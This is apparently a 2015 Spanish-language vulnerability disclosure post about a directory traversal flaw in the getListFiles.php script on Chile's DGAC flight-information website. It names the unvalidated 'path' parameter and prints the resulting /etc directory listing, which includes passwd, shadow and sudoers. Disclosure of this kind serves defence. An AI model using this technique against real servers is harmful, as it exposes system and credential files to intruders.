Investigaciones

Vulnerabilidad en sitio web de Internet Flight Information Service (IFIS), de la DGAC.

abril 17, 2015
Una vulnerabilidad del tipo Directory Traversal, que nos permite navegar por los directorios del servidor, fue detectada en el sitio web de Internet Flight Information Service. El sitio web corresponde a http://www.aipchile.gob.cl y mediante el script php getListFiles.php es posible listar el contenido de los distintos directorios del servidor. Dicho script no valida correctamente el […]

Una vulnerabilidad del tipo Directory Traversal, que nos permite navegar por los directorios del servidor, fue detectada en el sitio web de Internet Flight Information Service.

aipweb

El sitio web corresponde a http://www.aipchile.gob.cl y mediante el script php getListFiles.php es posible listar el contenido de los distintos directorios del servidor. Dicho script no valida correctamente el valor de la variable path. Originalmente el script se utiliza para revisar el estado de cámaras y se accede desde la URL http://www.aipchile.gob.cl/getListFiles.php?path=camara/ftp/STA…/Sur, sin embargo, modificando el valor de path podemos subir de nivel y listar directorios hasta llegar a la raíz.

Por ejemplo, listamos el directorio /etc

urlaipEl servidor nos entrega una lista con los directorios y archivos dentro del path especificado.

{“0″:”blkid.tab”,”1177727229″:”gnome-vfs-mime-magic”,”1212128523″:”ucf.conf”,”1235044662″:”logrotate.conf”,”1248534782″:”ltrace.conf”,”1259223815″:”zsh_command_not_found”,”1259856668″:”rpc”,”1259927181″:”lsb-base-logging.sh”,”1264587991″:”deluser.conf”,”1266922272″:”lsb-base”,”1267036005″:”rsyslog.conf”,”1267941508″:”ts.conf”,”1269280607″:”blkid.conf”,”1269434112″:”updatedb.conf”,”1270150122″:”magic”,”1272015944″:”nsswitch.conf”,”1273458206″:”insserv.conf”,”1273468975″:”libpaper.d”,”1273476856″:”nanorc”,”1274008728″:”mtools.conf”,”1275300352″:”inputrc”,”1275427270″:”mime.types”,”1276563336″:”hdparm.conf”,”1276598129″:”rmt”,”1276895632″:”screenrc”,”1277667522″:”at.deny”,”1281023834″:”locale.alias”,”1281137953″:”bash_completion”,”1281473254″:”bash.bashrc”,”1282013258″:”pam.conf”,”1282070974″:”manpath.config”,”1282157177″:”mke2fs.conf”,”1282682757″:”crontab”,”1283510657″:”login.defs”,”1283528208″:”wgetrc”,”1284138108″:”bindresvport.blacklist”,”1284138111″:”gai.conf”,”1285579308″:”fuse.conf”,”1285621446″:”debconf.conf”,”1286441275″:”lsb-release”,”1286442911″:”issue”,”1301080886″:”ftpusers”,”1305800435″:”iscsi”,”1305815208″:”hosts”,”1305815757″:”kernel”,”1305815762″:”opt”,”1305815778″:”terminfo”,”1305815783″:”environment”,”1305815784″:”python2.6″,”1305815785″:”adduser.conf”,”1305815786″:”depmod.d”,”1305815793″:”logcheck”,”1305815796″:”iproute2″,”1305815798″:”cron.monthly”,”1305815799″:”vim”,”1305815801″:”kbd”,”1305815803″:”console-setup”,”1305815814″:”lvm”,”1305818597″:”perl”,”1305818985″:”fonts”,”1305820063″:”ca-certificates”,”1305820068″:”apm”,”1305820081″:”ca-certificates.conf”,”1305820084″:”calendar”,”1305820085″:”groff”,”1305820086″:”cron.weekly”,”1305820092″:”chatscripts”,”1305820093″:”ufw”,”1305820094″:”hosts.allow”,”1305820191″:”pm”,”1305820192″:”grub.d”,”1305820807″:”kernel-img.conf”,”1305820809″:”sudoers”,”1305821060″:”security”,”1305821115″:”apparmor.d”,”1305821116″:”profile.d”,”1305821117″:”ldap”,”1305821118″:”w3m”,”1305821119″:”apparmor”,”1305821154″:”gamin”,”1305826049″:”cron.daily”,”1305830611″:”php5″,”1305831014″:”ConsoleKit”,”1305831015″:”xdg”,”1305831021″:”polkit-1″,”1305831026″:”gnome-vfs-2.0″,”1305831033″:”dbus-1″,”1305831037″:”pango”,”1305831038″:”papersize”,”1305831039″:”bonobo-activation”,”1305831040″:”obex-data-server”,”1305831083″:”gconf”,”1306764052″:”rc1.d”,”1309792793″:”pear”,”1309793244″:”dpkg”,”1309793719″:”mailcap”,”1309793913″:”ld.so.conf”,”1309795739″:”group-“,”1309795986″:”vsftpd.conf”,”1309797705″:”network”,”1309957244″:”shadow-“,”1328537093″:”updatedb.conf.old.0″,”1333139132″:”updatedb.conf.old.1″,”1339084724″:”ghostscript”,”1346938354″:”lighttpd”,”1346938799″:”cron.d”,”1346938926″:”awstats”,”1358621945″:”resolv.conf”,”1361544879″:”vga”,”1368804766″:”rsyslog.d”,”1378993840″:”apt”,”1383609049″:”ssh”,”1392404976″:”passwd”,”1392404977″:”gshadow”,”1392404990″:”shadow”,”1392406451″:”sysctl.d”,”1392406987″:”sysctl.conf”,”1410442776″:”gdm”,”1410442777″:”defoma”,”1410442781″:”pulse”,”1410442782″:”gtk-2.0″,”1410442783″:”default”,”1410873222″:”byobu”,”1415108000″:”mtab”,”1415369852″:”rc.local”,”1415989185″:”apache2″,”1422977578″:”mysql”,”1423764549″:”postgresql-common”,”1423764603″:”alternatives”,”1426602600″:”localtime”,”1426683143″:”rc0.d”,”1426683146″:”updatedb.conf.old.2″,”1426683159″:”fstab”,”1426683162″:”init”,”1426683164″:”pam.d”,”1426683166″:”ld.so.conf.d”,”1426683178″:”vmware-tools”,”1429188903″:”motd”}

Se intentó reportar la vulnerabilidad hace más de 1 mes sin ningun tipo de respuesta.

La vulnerabilidad ha sido catalogada con el ID #2616.

Comparte este Artículo

Artículos relacionados